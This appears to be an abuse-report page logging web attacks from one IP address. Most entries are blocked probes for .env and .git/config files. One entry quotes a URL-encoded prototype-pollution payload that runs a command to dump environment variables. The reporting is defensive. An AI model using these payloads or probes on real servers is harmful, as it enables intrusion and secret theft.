🇺🇸
TPI-Abuse
2026-09-20 15:21:25
(19 hours ago)
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercon ...
show more
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Sep 20 11:21:21.541524 2026] [security2:error] [pid 5532:tid 5532] [client 136.112.46.187:58016] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cyber-matrix.org"] [uri "/client/.env"] [unique_id "aq_58UrVcWxWKaRz-nWLDgAAAAA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇺🇸
TPI-Abuse
2026-09-20 15:04:59
(19 hours ago)
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercon ...
show more
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Sep 20 11:04:53.380042 2026] [security2:error] [pid 2972471:tid 2972471] [client 136.112.46.187:47846] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "communityofthecosmos.org"] [uri "/.env.production"] [unique_id "aq_2Fe_ceyZGTgsToK33bgAAACc"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇺🇸
jormaster3k
2026-09-20 14:45:18
(20 hours ago)
Attack against Apache (too many 404s)
Web App Attack
🇺🇸
TPI-Abuse
2026-09-20 14:45:16
(20 hours ago)
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercon ...
show more
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Sep 20 10:45:13.230961 2026] [security2:error] [pid 22861:tid 22861] [client 136.112.46.187:44260] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "centralbaptistalcoa.org"] [uri "/.git/config"] [unique_id "aq_xeUc-Y1qXoX00hEtTCQAAABY"]
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2026-09-20 14:40:01
(20 hours ago)
suspicious request in access.log
Web App Attack
🇺🇸
TPI-Abuse
2026-09-20 14:27:37
(20 hours ago)
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercon ...
show more
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Sep 20 10:27:31.274558 2026] [security2:error] [pid 3246:tid 3246] [client 136.112.46.187:60988] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "brupharm.org"] [uri "/.env"] [unique_id "aq_tU_a1X9fbcyxHpR9tCgAAAAA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇬🇧
Mendip_Defender
2026-09-20 14:14:56
(20 hours ago)
136.112.46.187 - - [20/Sep/2026:15:15:12 +0100] "GET /z9x8c7v6b5-debug-trigger-bevelheads.org HTTP/1 ...
show more
136.112.46.187 - - [20/Sep/2026:15:15:12 +0100] "GET /z9x8c7v6b5-debug-trigger-bevelheads.org HTTP/1.1" 404 6331 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected] )"
...
show less
Bad Web Bot
🇺🇸
TPI-Abuse
2026-09-20 14:05:12
(20 hours ago)
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercon ...
show more
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Sep 20 10:05:06.927043 2026] [security2:error] [pid 16363:tid 16441] [client 136.112.46.187:53316] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "ayubhamdardfoundation.org"] [uri "/.env.www"] [unique_id "aq_oEghP2Ec8aTqJGSvY5gAAAhY"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇺🇸
TPI-Abuse
2026-09-20 13:45:56
(21 hours ago)
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercon ...
show more
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Sep 20 09:45:51.680052 2026] [security2:error] [pid 25863:tid 25863] [client 136.112.46.187:39428] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "120"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "asburys.org"] [uri "/.env.example"] [unique_id "aq_jj_2uEEMXMgMGq4XdAAAAAB8"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇺🇸
TPI-Abuse
2026-09-20 13:18:39
(21 hours ago)
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercon ...
show more
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Sep 20 09:18:34.534548 2026] [security2:error] [pid 28984:tid 28984] [client 136.112.46.187:54702] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "andy-blakk.org"] [uri "/packages/.env"] [unique_id "aq_dKmtN60S8WFIwKIgTFQAAAA0"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇺🇸
TPI-Abuse
2026-09-20 12:59:16
(21 hours ago)
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercon ...
show more
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Sep 20 08:59:12.798231 2026] [security2:error] [pid 28132:tid 28132] [client 136.112.46.187:53164] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "allisonstiles.org"] [uri "/.git/config"] [unique_id "aq_YoDo-kDQ08RW4cmw91gAAAAs"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇫🇷
dynamix
2026-09-20 12:37:28
(22 hours ago)
Multiple WAF Violations
Web App Attack
🇮🇹
VHosting
2026-09-20 12:30:03
(22 hours ago)
Detected WordPress attack from different servers
Brute-Force
Web App Attack
🇺🇸
TPI-Abuse
2026-09-20 12:23:45
(22 hours ago)
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercon ...
show more
(mod_security) mod_security (id:210492) triggered by 136.112.46.187 (187.46.112.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Sep 20 08:23:38.571742 2026] [security2:error] [pid 18732:tid 18732] [client 136.112.46.187:60732] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "adona.org"] [uri "/.git/config"] [unique_id "aq_QSvO4KQa_1iEuXhHt-QAAAAU"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇺🇸
kosada.com
2026-09-20 12:19:59
(22 hours ago)
Repeated exploit attempts, for example: / 0=%7b%22then%22%3a%22%241%3a%5f%5fproto%5f%5f%3athen%22%2c ...
show more
Repeated exploit attempts, for example: / 0=%7b%22then%22%3a%22%241%3a%5f%5fproto%5f%5f%3athen%22%2c%22status%22%3a%22resolved%5fmodel%22%2c%22reason%22%3a%2d1%2c%22value%22%3a%22%7b%5c%22then%5c%22%3a%5c%22%24B1337%5c%22%7d%22%2c%22%5fresponse%22%3a%7b%22%5fprefix%22%3a%22process%2emainModule%2erequire%28%27child%5fprocess%27%29%2eexecSync%28%27env+2%3e%2fdev%2fnull+%7c%7c+cat+%2fproc%2fself%2fenviron+2%3e%2fdev%2fnull%27%29%3b%22%2c%22%5fformData%22%3a%7b%22get%22%3a%22%241%3aconstructor%3aconstructor%22%7d%7d%7d&1=%22%24%400%22 (HTTP/2.0 port 443, user agent: "Mozilla/5.0 (compatible; KimiBot/1.0; +https://kimi.ai/)")
show less
Web App Attack